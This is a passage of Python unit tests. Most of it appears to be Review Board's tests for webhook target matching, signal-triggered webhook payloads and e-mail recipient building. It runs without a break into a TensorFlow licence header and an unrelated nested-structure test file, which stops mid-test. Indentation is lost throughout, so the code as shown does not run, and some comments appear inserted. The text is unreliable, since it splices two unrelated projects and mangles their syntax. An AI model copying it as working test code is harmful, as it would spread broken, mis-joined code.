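        #                              b'{"items": [1, 2, 3]}',
        #                              hashlib.sha1).hexdigest()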
def _test_dispatch(self, handler, event, payload, expected_content_type,
expected_data, expected_sig_header=None):
def _urlopen(request):
self.assertEqual(request.get_full_url(), self.ENDPOINT_URL)
self.assertEqual(request.headers['X-reviewboard-event'], event)
self.assertEqual(request.headers['Content-type'],
expected_content_type)
self.assertEqual(request.data, expected_data)
self.assertEqual(request.headers['Content-length'],
len(expected_data))
if expected_sig_header:
self.assertIn('X-hub-signature', request.headers)
self.assertEqual(request.headers['X-hub-signature'],
expected_sig_header)
else:
self.assertNotIn('X-hub-signature', request.headers)
self.spy_on(urlopen, call_fake=_urlopen)
request = FakeHTTPRequest(None)
dispatch_webhook_event(request, [handler], event, payload)
class WebHookTargetManagerTests(TestCase):
"""Unit tests for WebHookTargetManager."""
ENDPOINT_URL = 'http://example.com/endpoint/'
def test_for_event(self):
"""Testing WebHookTargetManager.for_event"""
# These should not match.
WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
WebHookTarget.objects.create(
events='event3',
url=self.ENDPOINT_URL,
enabled=False,
apply_to=WebHookTarget.APPLY_TO_ALL)
# These should match.
target1 = WebHookTarget.objects.create(
events='event2,event3',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
target2 = WebHookTarget.objects.create(
events='*',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
targets = WebHookTarget.objects.for_event('event3')
self.assertEqual(targets, [target1, target2])
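    # for_event() treats a target's 'events' field as a comma-separated list
    # and also honors the '*' wildcard, which is why both target1 and target2
    # match 'event3' above while the disabled and non-matching targets don't.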
def test_for_event_with_local_site(self):
"""Testing WebHookTargetManager.for_event with Local Sites"""
site = LocalSite.objects.create(name='test-site')
# These should not match.
WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=False,
local_site=site,
apply_to=WebHookTarget.APPLY_TO_ALL)
# This should match.
target = WebHookTarget.objects.create(
events='event1,event2',
url=self.ENDPOINT_URL,
enabled=True,
local_site=site,
apply_to=WebHookTarget.APPLY_TO_ALL)
targets = WebHookTarget.objects.for_event('event1',
local_site_id=site.pk)
self.assertEqual(targets, [target])
@add_fixtures(['test_scmtools'])
def test_for_event_with_repository(self):
"""Testing WebHookTargetManager.for_event with repository"""
repository1 = self.create_repository()
repository2 = self.create_repository()
# These should not match.
unused_target1 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=False,
apply_to=WebHookTarget.APPLY_TO_SELECTED_REPOS)
unused_target1.repositories.add(repository2)
unused_target2 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=False,
apply_to=WebHookTarget.APPLY_TO_SELECTED_REPOS)
unused_target2.repositories.add(repository1)
WebHookTarget.objects.create(
events='event3',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_NO_REPOS)
# These should match.
target1 = WebHookTarget.objects.create(
events='event1,event2',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
target2 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_SELECTED_REPOS)
target2.repositories.add(repository1)
targets = WebHookTarget.objects.for_event('event1',
repository_id=repository1.pk)
self.assertEqual(targets, [target1, target2])
@add_fixtures(['test_scmtools'])
def test_for_event_with_no_repository(self):
"""Testing WebHookTargetManager.for_event with no repository"""
repository = self.create_repository()
# These should not match.
unused_target1 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_SELECTED_REPOS)
unused_target1.repositories.add(repository)
WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=False,
apply_to=WebHookTarget.APPLY_TO_NO_REPOS)
WebHookTarget.objects.create(
events='event2',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_NO_REPOS)
# These should match.
target1 = WebHookTarget.objects.create(
events='event1,event2',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_ALL)
target2 = WebHookTarget.objects.create(
events='event1',
url=self.ENDPOINT_URL,
enabled=True,
apply_to=WebHookTarget.APPLY_TO_NO_REPOS)
targets = WebHookTarget.objects.for_event('event1')
self.assertEqual(targets, [target1, target2])
def test_for_event_with_all_events(self):
"""Testing WebHookTargetManager.for_event with ALL_EVENTS"""
with self.assertRaisesMessage(ValueError,
'"*" is not a valid event choice'):
WebHookTarget.objects.for_event(WebHookTarget.ALL_EVENTS)
class WebHookSignalDispatchTests(SpyAgency, TestCase):
"""Unit tests for dispatching webhooks by signals."""
ENDPOINT_URL = 'http://example.com/endpoint/'
def setUp(self):
super(WebHookSignalDispatchTests, self).setUp()
self.spy_on(dispatch_webhook_event, call_original=False)
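        # With call_original=False, kgb stubs out dispatch_webhook_event
        # entirely: no HTTP request is ever made, and each test just inspects
        # the recorded spy calls for the target list, event name, and payload.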
@add_fixtures(['test_users'])
def test_review_request_closed_submitted(self):
"""Testing webhook dispatch from 'review_request_closed' signal
with submitted
"""
target = WebHookTarget.objects.create(events='review_request_closed',
url=self.ENDPOINT_URL)
review_request = self.create_review_request(publish=True)
review_request.close(review_request.SUBMITTED)
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_request_closed')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_request_closed')
self.assertEqual(payload['closed_by']['id'],
review_request.submitter.pk)
self.assertEqual(payload['close_type'], 'submitted')
self.assertEqual(payload['review_request']['id'],
review_request.display_id)
@add_fixtures(['test_users'])
def test_review_request_closed_discarded(self):
"""Testing webhook dispatch from 'review_request_closed' signal
with discarded
"""
target = WebHookTarget.objects.create(events='review_request_closed',
url=self.ENDPOINT_URL)
review_request = self.create_review_request()
review_request.close(review_request.DISCARDED)
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_request_closed')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_request_closed')
self.assertEqual(payload['closed_by']['id'],
review_request.submitter.pk)
self.assertEqual(payload['close_type'], 'discarded')
self.assertEqual(payload['review_request']['id'],
review_request.display_id)
@add_fixtures(['test_users'])
def test_review_request_published(self):
"""Testing webhook dispatch from 'review_request_published' signal"""
target = WebHookTarget.objects.create(
events='review_request_published',
url=self.ENDPOINT_URL)
review_request = self.create_review_request()
review_request.publish(review_request.submitter)
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_request_published')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_request_published')
self.assertIn('is_new', payload)
self.assertEqual(payload['review_request']['id'],
review_request.display_id)
@add_fixtures(['test_users'])
def test_review_request_reopened(self):
"""Testing webhook dispatch from 'review_request_reopened' signal"""
target = WebHookTarget.objects.create(
events='review_request_reopened',
url=self.ENDPOINT_URL)
review_request = self.create_review_request(publish=True)
review_request.close(review_request.SUBMITTED)
review_request.reopen()
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_request_reopened')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_request_reopened')
self.assertEqual(payload['reopened_by']['id'],
review_request.submitter.pk)
self.assertEqual(payload['review_request']['id'],
review_request.display_id)
@add_fixtures(['test_users'])
def test_review_published(self):
"""Testing webhook dispatch from 'review_published' signal"""
target = WebHookTarget.objects.create(events='review_published',
url=self.ENDPOINT_URL)
review_request = self.create_review_request()
review = self.create_review(review_request)
review.publish()
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_published')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_published')
self.assertEqual(payload['review']['id'], review.pk)
self.assertIn('diff_comments', payload)
self.assertIn('screenshot_comments', payload)
self.assertIn('file_attachment_comments', payload)
@add_fixtures(['test_users'])
def test_reply_published(self):
"""Testing webhook dispatch from 'reply_published' signal"""
target = WebHookTarget.objects.create(events='reply_published',
url=self.ENDPOINT_URL)
review_request = self.create_review_request()
review = self.create_review(review_request)
reply = self.create_reply(review)
reply.publish()
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'reply_published')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'reply_published')
self.assertEqual(payload['reply']['id'], reply.pk)
self.assertIn('diff_comments', payload)
self.assertIn('screenshot_comments', payload)
self.assertIn('file_attachment_comments', payload)
class EmailUtilsTests(TestCase):
"""Testing e-mail utilities that do not send e-mails."""
def test_recipients_to_addresses_with_string_address(self):
"""Testing generating addresses from recipients with string recipients
"""
with self.assertRaises(AssertionError):
recipients_to_addresses(['foo@example.com'])
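        # recipients_to_addresses() expects User and Group model instances,
        # not pre-formatted address strings; passing a bare string is a
        # programming error, hence the AssertionError above.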
@add_fixtures(['test_users'])
def test_recipients_to_addresses_with_users(self):
"""Testing generating addresses from recipients with user recipients
"""
users = list(User.objects.filter(username__in=['doc', 'grumpy']))
addresses = recipients_to_addresses(users)
self.assertEqual(len(addresses), 2)
expected_addresses = set(
get_email_address_for_user(u)
for u in users
)
self.assertEqual(addresses, expected_addresses)
def test_recipients_to_addresses_with_groups_single_mailinglist(self):
"""Testing generating addresses from recipients that are groups with a
single mailing list address
"""
groups = [
Group(name='group1', display_name='Group One',
mailing_list='group1@example.com'),
Group(name='group2', display_name='Group Two',
mailing_list='group2@example.com'),
]
addresses = recipients_to_addresses(groups)
self.assertEqual(len(addresses), 2)
expected_addresses = set(sum(
(
get_email_addresses_for_group(group)
for group in groups
),
[]))
self.assertEqual(addresses, expected_addresses)
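    # sum(generator_of_lists, []) is used here and below as a simple way to
    # flatten the per-group address lists into one list before comparing.
    # It is roughly equivalent to:
    #
    #     [address
    #      for group in groups
    #      for address in get_email_addresses_for_group(group)]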
def test_recipients_to_addresses_with_groups_many_mailinglist(self):
"""Testing generating addresses from recipients that are groups with
multiple mailing list addresses
"""
groups = [
Group(name='group1', display_name='Group One',
mailing_list='group1a@example.com,group1b@example.com'),
Group(name='group2', display_name='Group Two',
mailing_list='group2a@example.com,group2b@example.com'),
]
addresses = recipients_to_addresses(groups)
self.assertEqual(len(addresses), 4)
expected_addresses = set(sum(
(
get_email_addresses_for_group(group)
for group in groups
),
[]))
self.assertEqual(addresses, expected_addresses)
@add_fixtures(['test_users'])
def test_recipients_to_addresses_with_groups_and_users(self):
"""Testing generating addresses from recipients that are users and
groups with mailing list addresses
"""
groups = [
Group(name='group1', display_name='Group One',
mailing_list='group1@example.com'),
Group(name='group2', display_name='Group Two',
mailing_list='group2@example.com'),
]
users = list(User.objects.filter(username__in=['doc', 'grumpy']).all())
addresses = recipients_to_addresses(groups + users)
self.assertEqual(len(addresses), 4)
user_addresses = [
get_email_address_for_user(u)
for u in users
]
group_addresses = sum(
(
get_email_addresses_for_group(group)
for group in groups
),
[])
self.assertEqual(addresses,
set(user_addresses + group_addresses))
def test_recipients_to_addresses_with_groups_with_members(self):
"""Testing generating addresses from recipients that are groups with
no mailing list addresses
"""
group1 = Group.objects.create(name='group1')
group2 = Group.objects.create(name='group2')
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
group1.users = [user1]
group2.users = [user2]
addresses = recipients_to_addresses([group1, group2])
expected_addresses = set([
get_email_address_for_user(user1),
get_email_address_for_user(user2),
])
self.assertEqual(addresses, expected_addresses)
def test_recipients_to_addresses_with_groups_local_site(self):
"""Testing generating addresses from recipients that are groups in
local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
group1 = Group.objects.create(name='group1', local_site=local_site1)
group2 = Group.objects.create(name='group2', local_site=local_site2)
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
local_site1.users = [user1]
group1.users = [user1]
group2.users = [user2]
addresses = recipients_to_addresses([group1, group2])
self.assertEqual(len(addresses), 1)
self.assertEqual(addresses, set([get_email_address_for_user(user1)]))
def test_recipients_to_addresses_with_groups_inactive_members(self):
"""Testing generating addresses form recipients that are groups with
inactive members
"""
group1 = self.create_review_group('group1')
group2 = self.create_review_group('group2')
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
group1.users = [user1]
group2.users = [user2]
addresses = recipients_to_addresses([group1, group2])
self.assertEqual(len(addresses), 1)
self.assertEqual(addresses, set([get_email_address_for_user(user1)]))
def test_recipients_to_addresses_groups_local_site_inactive_members(self):
"""Testing generating addresses from recipients that are groups in
local sites that have inactive members
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
group1 = self.create_review_group('group1', local_site=local_site1)
group2 = self.create_review_group('group2', local_site=local_site2)
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
local_site1.users = [user1]
local_site2.users = [user2]
group1.users = [user1]
group2.users = [user2]
addresses = recipients_to_addresses([group1, group2])
self.assertEqual(len(addresses), 1)
self.assertEqual(addresses, set([get_email_address_for_user(user1)]))
@add_fixtures(['test_users'])
def test_build_recipients_user_receive_email(self):
"""Testing building recipients for a review request where the user
wants to receive e-mail
"""
review_request = self.create_review_request()
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_user_not_receive_email(self):
"""Testing building recipients for a review request where the user
does not want to receive e-mail
"""
review_request = self.create_review_request()
submitter = review_request.submitter
profile = submitter.get_profile()
profile.should_send_email = False
profile.save()
to, cc = build_recipients(submitter, review_request)
self.assertEqual(len(to), 0)
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_user_not_receive_own_email(self):
"""Testing building recipients for a review request where the user
does not want to receive e-mail about their updates
"""
review_request = self.create_review_request()
submitter = review_request.submitter
profile = submitter.get_profile()
profile.should_send_own_updates = False
profile.save()
to, cc = build_recipients(submitter, review_request)
self.assertEqual(len(to), 0)
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_target_people_not_receive_own_email(self):
"""Testing building recipieints for a review request where the
submitter is a reviewer and doesn't want to receive e-mail about their
updates
"""
review_request = self.create_review_request()
submitter = review_request.submitter
review_request.target_people = [submitter]
profile = submitter.get_profile()
profile.should_send_own_updates = False
profile.save()
to, cc = build_recipients(submitter, review_request)
self.assertEqual(len(to), 0)
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipient_user_not_receive_own_email(self):
"""Testing building recipients for a review request where the
submitter is a reviewer and doesn't want to receive e-mail about their
updates
"""
review_request = self.create_review_request()
submitter = review_request.submitter
profile = submitter.get_profile()
profile.should_send_own_updates = False
profile.save()
to, cc = build_recipients(submitter, review_request, [submitter])
self.assertEqual(len(to), 0)
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_target_people_and_groups(self):
"""Testing building recipients for a review request where there are
target users and groups
"""
group = self.create_review_group()
user = User.objects.get(username='grumpy')
review_request = self.create_review_request()
review_request.target_people = [user]
review_request.target_groups = [group]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user]))
self.assertEqual(cc, set([submitter, group]))
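        # Note the recipient split build_recipients() produces here: target
        # people land in 'to', while the submitter and target groups are
        # CC'd.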
@add_fixtures(['test_users'])
def test_build_recipients_target_people_inactive_and_groups(self):
"""Testing building recipients for a review request where there are
target groups and inactive target users
"""
group = self.create_review_group()
user = User.objects.create(username='user', first_name='User',
last_name='Foo', is_active=False)
review_request = self.create_review_request()
review_request.target_people = [user]
review_request.target_groups = [group]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter, group]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_target_groups(self):
"""Testing build recipients for a review request where there are target
groups
"""
group1 = self.create_review_group('group1')
group2 = self.create_review_group('group2')
review_request = self.create_review_request()
review_request.target_groups = [group1, group2]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(len(to), 3)
self.assertEqual(to, set([submitter, group1, group2]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_target_people(self):
"""Testing building recipients for a review request with target people
"""
review_request = self.create_review_request()
submitter = review_request.submitter
grumpy = User.objects.get(username='grumpy')
review_request.target_people = [grumpy]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([grumpy]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_inactive(self):
"""Testing building recipients for a review request with target people
who are inactive
"""
review_request = self.create_review_request()
submitter = review_request.submitter
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
review_request.target_people = [user1, user2]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user1]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_no_email(self):
"""Testing building recipients for a review request with target people
who don't receive e-mail
"""
review_request = self.create_review_request()
submitter = review_request.submitter
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
Profile.objects.create(user=user2, should_send_email=False)
review_request.target_people = [user1, user2]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user1]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_local_site(self):
"""Testing building recipients for a review request where the target
people are in local sites
"""
local_site = LocalSite.objects.create(name=self.local_site_name)
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
local_site.users = [user1]
review_request = self.create_review_request(with_local_site=True)
review_request.target_people = [user1, user2]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user1]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_local_site_inactive(self):
"""Testing building recipients for a review request where the target
people are in local sites and are inactive
"""
local_site = LocalSite.objects.create(name=self.local_site_name)
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
local_site.users = [user1, user2]
review_request = self.create_review_request(with_local_site=True)
review_request.target_people = [user1, user2]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user1]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_local_site_no_email(self):
"""Testing building recipients for a review request where the target
        people are in local sites and don't receive e-mail
"""
local_site = LocalSite.objects.create(name=self.local_site_name)
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
Profile.objects.create(user=user2,
should_send_email=False)
local_site.users = [user1, user2]
review_request = self.create_review_request(with_local_site=True)
review_request.target_people = [user1, user2]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user1]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_limit_to(self):
"""Testing building recipients with a limited recipients list"""
dopey = User.objects.get(username='dopey')
grumpy = User.objects.get(username='grumpy')
group = self.create_review_group()
review_request = self.create_review_request()
submitter = review_request.submitter
review_request.target_people = [dopey]
review_request.target_groups = [group]
to, cc = build_recipients(submitter, review_request,
limit_recipients_to=[grumpy])
self.assertEqual(to, set([submitter, grumpy]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_limit_to_inactive(self):
"""Testing building recipients with a limited recipients list that
contains inactive users
"""
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
review_request = self.create_review_request()
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request,
limit_recipients_to=[user1, user2])
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_limit_to_local_site(self):
"""Testing building recipients with a limited recipients list that
contains users in local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
local_site1.users = [user1]
local_site2.users = [user2]
review_request = self.create_review_request(local_site=local_site1)
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request,
limit_recipients_to=[user1, user2])
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients(self):
"""Testing building recipients with an extra recipients list"""
review_request = self.create_review_request()
submitter = review_request.submitter
grumpy = User.objects.get(username='grumpy')
to, cc = build_recipients(submitter, review_request,
extra_recipients=[grumpy])
self.assertEqual(to, set([submitter, grumpy]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_inactive(self):
"""Testing building recipients with an extra recipients list that
contains inactive users
"""
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
review_request = self.create_review_request()
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1, user2])
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_local_site(self):
"""Testing building recipients with an extra recipients list that
contains users in local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
local_site1.users = [user1]
local_site2.users = [user2]
review_request = self.create_review_request(local_site=local_site1)
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1, user2])
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_and_limit_to(self):
"""Testing building recipients with an extra recipients list and
a limited recipients list
"""
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
user3 = User.objects.create(username='user3', first_name='User',
last_name='Three')
group = self.create_review_group()
review_request = self.create_review_request()
submitter = review_request.submitter
review_request.target_people = [user3]
review_request.target_groups = [group]
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1],
limit_recipients_to=[user2])
self.assertEqual(to, set([submitter, user2]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_and_limit_to_inactive(self):
"""Testing building recipients with an extra recipients list and a
limited recipients list that contains inactive users
"""
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
user3 = User.objects.create(username='user3', first_name='User',
last_name='Three')
group = self.create_review_group()
review_request = self.create_review_request()
submitter = review_request.submitter
review_request.target_people = [user3]
review_request.target_groups = [group]
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1],
limit_recipients_to=[user2])
self.assertEqual(to, set([submitter]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_and_limit_to_local_site(self):
"""Testing building recipients with an extra recipients list and a
limited recipients list that contains users in local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
user3 = User.objects.create(username='user3', first_name='User',
last_name='Three')
local_site1.users = [user1, user3]
local_site2.users = [user2]
group = self.create_review_group()
review_request = self.create_review_request(local_site=local_site1)
submitter = review_request.submitter
review_request.target_people = [user3]
review_request.target_groups = [group]
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1],
limit_recipients_to=[user2])
self.assertEqual(to, set([submitter]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_starred(self):
"""Testing building recipients where the review request has been
starred by a user
"""
review_request = self.create_review_request()
submitter = review_request.submitter
grumpy = User.objects.get(username='grumpy')
profile = grumpy.get_profile()
profile.starred_review_requests = [review_request]
profile.save()
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter, grumpy]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_starred_inactive(self):
"""Testing building recipients where the review request has been
starred by users that may be inactive
"""
review_request = self.create_review_request()
submitter = review_request.submitter
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
profile1 = Profile.objects.create(user=user1)
profile1.starred_review_requests = [review_request]
profile2 = Profile.objects.create(user=user2)
profile2.starred_review_requests = [review_request]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_starred_local_site(self):
"""Testing building recipients where the review request has been
starred by users that are in local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
review_request = self.create_review_request(local_site=local_site1)
submitter = review_request.submitter
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
local_site1.users = [user1]
local_site2.users = [user2]
profile1 = Profile.objects.create(user=user1)
profile1.starred_review_requests = [review_request]
profile2 = Profile.objects.create(user=user2)
profile2.starred_review_requests = [review_request]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for utilities working with arbitrarily nested structures."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
from tensorflow.python.data.util import nest
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class NestTest(test.TestCase):
def testFlattenAndPack(self):
structure = ((3, 4), 5, (6, 7, (9, 10), 8))
flat = ["a", "b", "c", "d", "e", "f", "g", "h"]
self.assertEqual(nest.flatten(structure), [3, 4, 5, 6, 7, 9, 10, 8])
self.assertEqual(
nest.pack_sequence_as(structure, flat), (("a", "b"), "c",
("d", "e", ("f", "g"), "h")))
point = collections.namedtuple("Point", ["x", "y"])
structure = (point(x=4, y=2), ((point(x=1, y=0),),))
flat = [4, 2, 1, 0]
self.assertEqual(nest.flatten(structure), flat)
restructured_from_flat = nest.pack_sequence_as(structure, flat)
self.assertEqual(restructured_from_flat, structure)
self.assertEqual(restructured_from_flat[0].x, 4)
self.assertEqual(restructured_from_flat[0].y, 2)
self.assertEqual(restructured_from_flat[1][0][0].x, 1)
self.assertEqual(restructured_from_flat[1][0][0].y, 0)
self.assertEqual([5], nest.flatten(5))
self.assertEqual([np.array([5])], nest.flatten(np.array([5])))
self.assertEqual("a", nest.pack_sequence_as(5, ["a"]))
self.assertEqual(
np.array([5]), nest.pack_sequence_as("scalar", [np.array([5])]))
with self.assertRaisesRegexp(ValueError, "Structure is a scalar"):
nest.pack_sequence_as("scalar", [4, 5])
with self.assertRaisesRegexp(TypeError, "flat_sequence"):
nest.pack_sequence_as([4, 5], "bad_sequence")
with self.assertRaises(ValueError):
nest.pack_sequence_as([5, 6, [7, 8]], ["a", "b", "c"])
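  # Note added for illustration: the invariant exercised above is that
  # pack_sequence_as(structure, nest.flatten(structure)) round-trips the
  # structure, preserving namedtuple types along the way.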
def testFlattenDictOrder(self):
"""`flatten` orders dicts by key, including OrderedDicts."""
ordered = collections.OrderedDict([("d", 3), ("b", 1), ("a", 0), ("c", 2)])
